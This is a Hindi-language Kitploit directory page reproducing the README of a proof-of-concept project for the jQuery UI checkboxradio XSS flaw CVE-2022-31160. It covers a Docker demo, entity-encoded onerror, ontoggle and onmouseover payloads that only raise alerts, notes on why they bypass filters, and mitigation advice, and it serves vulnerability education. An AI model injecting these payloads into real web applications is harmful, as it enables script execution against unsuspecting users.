Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
jquery-cve-2022-31160 — jquery XSS Proof of Concept (PoC) | Kitploit
उपकरण/GitHubGitHub/cyberone-teamares/jquery-cve-2022-31160
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityCTFLearning & Education
GitHubcyberone-teamares/jquery-cve-2022-31160

jquery-cve-2022-31160

jquery XSS Proof of Concept (PoC)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

jQuery UI CVE-2022-31160 भेद्यता प्रदर्शन

Security Badge jQuery UI CVE Docker

यह प्रोजेक्ट jQuery UI Checkboxradio विजेट भेद्यता (CVE-2022-31160) का प्रदर्शन करता है, जो विजेट रिफ्रेश ऑपरेशन के दौरान HTML एंटिटी डिकोडिंग की अनुमति देता है, जो पोटेंशियली क्रॉस-साइट स्क्रिप्टिंग (XSS) हमलों का कारण बन सकता है।

🚨 सुरक्षा चेतावनी

⚠️ इस प्रोजेक्ट में केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए कार्यशील XSS पेलोड शामिल हैं।

  • प्रोडक्शन सिस्टम पर उपयोग न करें
  • केवल नियंत्रित वातावरण में उपयोग करें
  • सुरक्षा अनुसंधान और शिक्षा के लिए अभिप्रेत है

📋 विषय सूची

  • भेद्यता अवलोकन
  • त्वरित प्रारंभ
  • प्रोजेक्ट संरचना
  • प्रदर्शन
  • तकनीकी विवरण
  • Docker उपयोग
  • सुरक्षा विश्लेषण
  • शमन
  • योगदान

🔍 भेद्यता अवलोकन

CVE-2022-31160 विवरण

  • घटक: jQuery UI Checkboxradio विजेट
  • प्रभावित संस्करण: jQuery UI ≤ 1.13.1
  • भेद्यता प्रकार: HTML एंटिटी डिकोडिंग के माध्यम से क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • CVSS स्कोर: 6.1 (मध्यम)
  • पहली बार प्रकाशित: 20 जुलाई, 2022

मूल कारण

जब किसी लेबल के अंदर संलग्न इनपुट पर checkboxradio विजेट को आरंभ किया जाता है, तो विजेट पर .checkboxradio("refresh") कॉल करने से लेबल सामग्री में HTML एंटिटीज़ गलती से डिकोड हो जाती हैं। यह सुरक्षित रूप से एन्कोडेड दुर्भावनापूर्ण सामग्री को निष्पादन योग्य JavaScript में बदल सकता है।

हमला वेक्टर

root@kitploit:~
<!-- सुरक्षित एन्कोडेड सामग्री -->
<label for="checkbox">
  Text &lt;img src=x onerror=&quot;alert('XSS')&quot;&gt;
  <input type="checkbox" id="checkbox">
</label>

<!-- .checkboxradio("refresh") के बाद -->
<label for="checkbox">
  Text 
  <input type="checkbox" id="checkbox">
</label>

🚀 त्वरित प्रारंभ

आवश्यक शर्तें

  • आपके सिस्टम पर Docker स्थापित हो
  • वेब ब्राउज़र जिसमें डेवलपर टूल हों
  • वेब सुरक्षा अवधारणाओं की बुनियादी समझ

बिल्ड और रन

root@kitploit:~
# क्लोन करें या प्रोजेक्ट निर्देशिका में जाएं
cd jquery-cve-2022-31160

# Docker इमेज बनाएं
docker build -t jquery-cve-2022-31160 .

# कंटेनर चलाएं
docker run -p 3000:3000 jquery-cve-2022-31160

प्रदर्शनों तक पहुंचें

एक बार कंटेनर चलने के बाद, एक्सेस करें:

  • सरलीकृत सर्वेक्षण प्रदर्शन: http://localhost:3000/survey
  • वैकल्पिक सर्वेक्षण URL: http://localhost:3000/simplified-survey

📁 प्रोजेक्ट संरचना

root@kitploit:~
jquery-cve-2022-31160/
├── README.md                    # यह दस्तावेज़ीकरण
├── Dockerfile                   # Docker कंटेनर कॉन्फ़िगरेशन
├── package.json                 # Node.js निर्भरताएं
├── server.js                    # Express.js सर्वर
└── simplified-survey.html       # सर्वेक्षण-शैली प्रदर्शन

🎯 प्रदर्शन

1. सरलीकृत सर्वेक्षण प्रदर्शन (simplified-survey.html)

URL: http://localhost:3000/survey

  • सर्वेक्षण-शैली इंटरफ़ेस
  • एकाधिक भेद्यता परिदृश्य
  • उन्नत दृश्य प्रतिक्रिया

विशेषताएं:

  • 4 विभिन्न चेकबॉक्स विकल्प जो विभिन्न परिदृश्य दिखाते हैं:
    • सुरक्षित विकल्प: कोई एन्कोडेड एंटिटी नहीं (नियंत्रण समूह)
    • नेटवर्क सुरक्षा XSS: &lt;img src=x onerror=&quot;...&quot;&gt; - तत्काल निष्पादन
    • मोबाइल सुरक्षा XSS: &lt;details ontoggle=&quot;...&quot; open&gt; - तत्काल निष्पादन
    • क्लाउड सुरक्षा XSS: &lt;span onmouseover=&quot;...&quot;&gt; - इंटरैक्टिव निष्पादन

विश्लेषण उपकरण:

  • विस्तृत कंसोल लॉगिंग
  • XSS निष्पादन अलर्ट
  • चरण-दर-चरण भेद्यता ट्रैकिंग

🔧 तकनीकी विवरण

भेद्यता तंत्र

  1. विजेट आरंभीकरण: jQuery UI checkboxradio विजेट बनाता है
  2. HTML एंटिटी भंडारण: एन्कोडेड एंटिटी वाली लेबल सामग्री प्रोसेस होती है
  3. रिफ्रेश ट्रिगर: .checkboxradio("refresh") कॉल किया जाता है
  4. एंटिटी डिकोडिंग: jQuery UI गलती से HTML एंटिटी को डिकोड करता है
  5. XSS निष्पादन: डिकोड की गई दुर्भावनापूर्ण सामग्री निष्पादन योग्य हो जाती है

प्रभावित कोड पथ

root@kitploit:~
// कमजोर ऑपरेशन
$('#vulnerable-checkbox').checkboxradio();
$('#vulnerable-checkbox').checkboxradio("refresh"); // भेद्यता ट्रिगर करता है

परीक्षण पेलोड

प्रदर्शनों में विभिन्न XSS निष्पादन विधियों का परीक्षण करने के लिए कई पेलोड शामिल हैं:

root@kitploit:~
<!-- नेटवर्क सुरक्षा: एरर इवेंट XSS (तत्काल निष्पादन) -->
&lt;img src=x onerror=&quot;console.log('XSS via widget refresh!'); alert('Widget refresh XSS executed!');&quot;&gt;

<!-- मोबाइल सुरक्षा: विवरण टॉगल XSS (तत्काल निष्पादन) -->
&lt;details ontoggle=&quot;alert('Mobile Security XSS executed!'); console.log('Mobile XSS via details ontoggle!')&quot; open&gt;&lt;summary&gt;&lt;/summary&gt;&lt;/details&gt;

<!-- क्लाउड सुरक्षा: इंटरैक्टिव XSS (उपयोगकर्ता इंटरैक्शन आवश्यक) -->
&lt;span onmouseover=&quot;alert('Hover XSS executed!'); console.log('Cloud Security XSS via mouseover!')&quot; style=&quot;text-decoration:underline; cursor:pointer;&quot;&gt;[Hover to trigger]&lt;/span&gt;

XSS निष्पादन विधियाँ

1. एरर इवेंट हैंडलर (onerror)

  • ट्रिगर: तत्काल जब तत्व DOM में डाला जाता है
  • विश्वसनीयता: बहुत अधिक (हमेशा src=x से विफल होता है)
  • उपयोग मामला: तत्काल XSS निष्पादन प्रदर्शित करता है
  • वास्तविक-जोखिम: उच्च - सामान्यतः इनपुट फ़िल्टर को बायपास करता है

2. डिटेल्स टॉगल इवेंट हैंडलर (ontoggle)

  • ट्रिगर: जब details तत्व खुलने/बंद होने की स्थिति बदलता है
  • विश्वसनीयता: बहुत अधिक (open विशेषता के साथ गारंटीड ट्रिगर)
  • उपयोग मामला: DOM सम्मिलन पर तत्काल निष्पादन
  • वास्तविक-जोखिम: उच्च - क्रॉस-ब्राउज़र विश्वसनीय निष्पादन

3. माउस इवेंट हैंडलर (onmouseover)

  • ट्रिगर: उपयोगकर्ता इंटरैक्शन की आवश्यकता (होवर)
  • विश्वसनीयता: जब उपयोगकर्ता इंटरैक्ट करता है तो उच्च
  • उपयोग मामला: सोशल इंजीनियरिंग परिदृश्य
  • वास्तविक-जोखिम: मध्यम - उपयोगकर्ता संलग्नता की आवश्यकता

ये पेलोड क्यों काम करते हैं

इवेंट हैंडलर लाभ:

  • innerHTML के माध्यम से तत्व डाले जाने पर निष्पादित होते हैं
  • <script> टैग प्रतिबंधों को बायपास करते हैं
  • विभिन्न ब्राउज़रों में लगातार काम करते हैं
  • बाहरी संसाधनों को लोड करने की आवश्यकता नहीं होती
  • स्थिति-आधारित ट्रिगर (जैसे ontoggle) अत्यधिक विश्वसनीय होते हैं

एन्कोडिंग बायपास:

  • HTML एंटिटीज़ (&lt;, &quot;) jQuery UI रिफ्रेश द्वारा डिकोड हो जाती हैं
  • सुरक्षित एन्कोडेड सामग्री को निष्पादन योग्य कोड में बदल देती हैं
  • वास्तविक-दुनिया के सैनिटाइज़ेशन बायपास प्रदर्शित करता है
  • एकाधिक निष्पादन वेक्टर हमले की सतह की विविधता दिखाते हैं

🐳 Docker उपयोग

इमेज बनाना

root@kitploit:~
docker build -t jquery-cve-2022-31160 .

कंटेनर चलाना

root@kitploit:~
# डिफ़ॉल्ट पोर्ट 3000 पर चलाएं
docker run -p 3000:3000 jquery-cve-2022-31160

# कस्टम पोर्ट पर चलाएं
docker run -p 8080:3000 jquery-cve-2022-31160

# बैकग्राउंड में चलाएं
docker run -d -p 3000:3000 jquery-cve-2022-31160

# कस्टम नाम से चलाएं
docker run --name jquery-xss-demo -p 3000:3000 jquery-cve-2022-31160

कंटेनर प्रबंधन

root@kitploit:~
# चल रहे कंटेनरों की सूची
docker ps

# कंटेनर रोकें
docker stop jquery-cve-2022-31160

# कंटेनर हटाएं
docker rm jquery-cve-2022-31160

# इमेज हटाएं
docker rmi jquery-cve-2022-31160

🔬 सुरक्षा विश्लेषण

प्रभाव आकलन

  • गंभीरता: मध्यम (CVSS 6.1)
  • हमला जटिलता: निम्न
  • उपयोगकर्ता इंटरैक्शन: आवश्यक (पेज इंटरैक्शन)
  • दायरा: अपरिवर्तित (समान-मूल)
  • गोपनीयता: निम्न प्रभाव
  • अखंडता: निम्न प्रभाव
  • उपलब्धता: कोई नहीं

वास्तविक-दुनिया के परिदृश्य

यह भेद्यता उन अनुप्रयोगों में शोषित की जा सकती है जो:

  1. jQuery UI checkboxradio विजेट का उपयोग करते हैं
  2. लेबल में उपयोगकर्ता-जनित सामग्री की अनुमति देते हैं
  3. HTML एंटिटी एन्कोडिंग का उपयोग करके सामग्री को सैनिटाइज़ करते हैं
  4. प्रोग्रामेटिक रूप से विजेट रिफ्रेश करते हैं

पता लगाने के तरीके

  • स्टैटिक विश्लेषण: .checkboxradio("refresh") कॉल खोजें
  • डायनेमिक विश्लेषण: विजेट ऑपरेशन के दौरान HTML सामग्री परिवर्तनों की निगरानी करें
  • स्वचालित स्कैनिंग: DOM-आधारित XSS का पता लगाने वाले टूल का उपयोग करें
  • मैनुअल परीक्षण: एन्कोडेड पेलोड के साथ विजेट रिफ्रेश का परीक्षण करें

🛡️ शमन

तत्काल कार्रवाई

  1. jQuery UI अपडेट करें: संस्करण 1.13.2 या बाद में अपग्रेड करें
  2. इनपुट सत्यापन: उचित सर्वर-साइड सत्यापन लागू करें
  3. सामग्री सुरक्षा नीति: प्रतिबंधात्मक CSP हेडर तैनात करें
  4. आउटपुट एन्कोडिंग: संदर्भ-उपयुक्त आउटपुट एन्कोडिंग का उपयोग करें

कोड सुधार

root@kitploit:~
// रिफ्रेश से पहले सामग्री को सैनिटाइज़ या मान्य करें
function safeRefresh(element) {
    // रिफ्रेश से पहले लेबल सामग्री मान्य करें
    const label = $(`label[for="${element.attr('id')}"]`);
    const content = label.html();
    
    // संभावित खतरनाक सामग्री की जाँच करें
    if (content.includes('<') || content.includes('javascript:')) {
        console.warn('संभावित खतरनाक सामग्री का पता चला');
        return;
    }
    
    element.checkboxradio("refresh");
}

सुरक्षा हेडर

root@kitploit:~
// Express.js सुरक्षा हेडर
app.use((req, res, next) => {
    res.setHeader('X-Content-Type-Options', 'nosniff');
    res.setHeader('X-Frame-Options', 'DENY');
    res.setHeader('X-XSS-Protection', '1; mode=block');
    res.setHeader('Content-Security-Policy', "default-src 'self'");
    next();
});

📚 शैक्षिक मूल्य

यह प्रोजेक्ट निम्नलिखित के लिए एक शैक्षिक संसाधन के रूप में कार्य करता है:

  • सुरक्षा शोधकर्ता: DOM हेरफेर भेद्यताओं को समझना
  • वेब डेवलपर: jQuery UI सुरक्षा विचारों के बारे में सीखना
  • पेनेट्रेशन टेस्टर: व्यावहारिक XSS शोषण तकनीक
  • सुरक्षा छात्र: व्यावहारिक भेद्यता विश्लेषण

🔗 संदर्भ

  • CVE-2022-31160 आधिकारिक प्रविष्टि
  • jQuery UI सुरक्षा सलाहकार
  • OWASP XSS रोकथाम चीट शीट
  • CWE-79: क्रॉस-साइट स्क्रिप्टिंग

📈 परीक्षण चेकलिस्ट

इस प्रदर्शन का उपयोग करते समय:

पूर्व-परीक्षण सेटअप:

  • jQuery UI संस्करण सत्यापित करें (1.13.0 होना चाहिए)
  • डेवलपर टूल खोलकर परीक्षण करें (F12)
  • http://localhost:3000/survey पर सर्वेक्षण एक्सेस करें
  • आरंभीकरण संदेशों के लिए कंसोल जाँचें

भेद्यता परीक्षण:

  • "🔄 Refresh Widgets" बटन पर क्लिक करें
  • नेटवर्क सुरक्षा विकल्प: तत्काल अलर्ट निष्पादन सत्यापित करें
  • मोबाइल सुरक्षा विकल्प: तत्काल अलर्ट निष्पादन सत्यापित करें
  • क्लाउड सुरक्षा विकल्प: "[Hover to trigger]" टेक्स्ट पर होवर करें
  • विस्तृत भेद्यता लॉगिंग के लिए कंसोल जाँचें

विश्लेषण सत्यापन:

  • XSS पेलोड निष्पादन मान्य करें (3 विभिन्न प्रकार)
  • विजेट रीसेट कार्यक्षमता का परीक्षण करें
  • चेकबॉक्स दृश्य प्रतिक्रिया सही ढंग से काम करने की पुष्टि करें

🤝 योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. अपने परिवर्तन करें
  4. उचित दस्तावेज़ीकरण जोड़ें
  5. एक पुल अनुरोध सबमिट करें

सुधार के क्षेत्र

  • अतिरिक्त पेलोड उदाहरण
  • अधिक विस्तृत विश्लेषण उपकरण
  • उन्नत दृश्य प्रदर्शन

⚖️ कानूनी अस्वीकरण

यह सॉफ्टवेयर केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक और योगदानकर्ता:

  • इस सॉफ्टवेयर के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं
  • दुर्भावनापूर्ण गतिविधियों को प्रोत्साहित या समर्थन नहीं करते
  • केवल अधिकृत परीक्षण वातावरण में उपयोग करने की सलाह देते हैं
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करने की सलाह देते हैं

📄 लाइसेंस

यह प्रोजेक्ट शैक्षिक उद्देश्यों के लिए MIT लाइसेंस के तहत प्रदान किया गया है।


सुरक्षा अनुसंधान और शिक्षा के लिए बनाया गया | जिम्मेदारी से उपयोग करें | उचित चैनलों के माध्यम से भेद्यताओं की रिपोर्ट करें

टूल डाउनलोड करें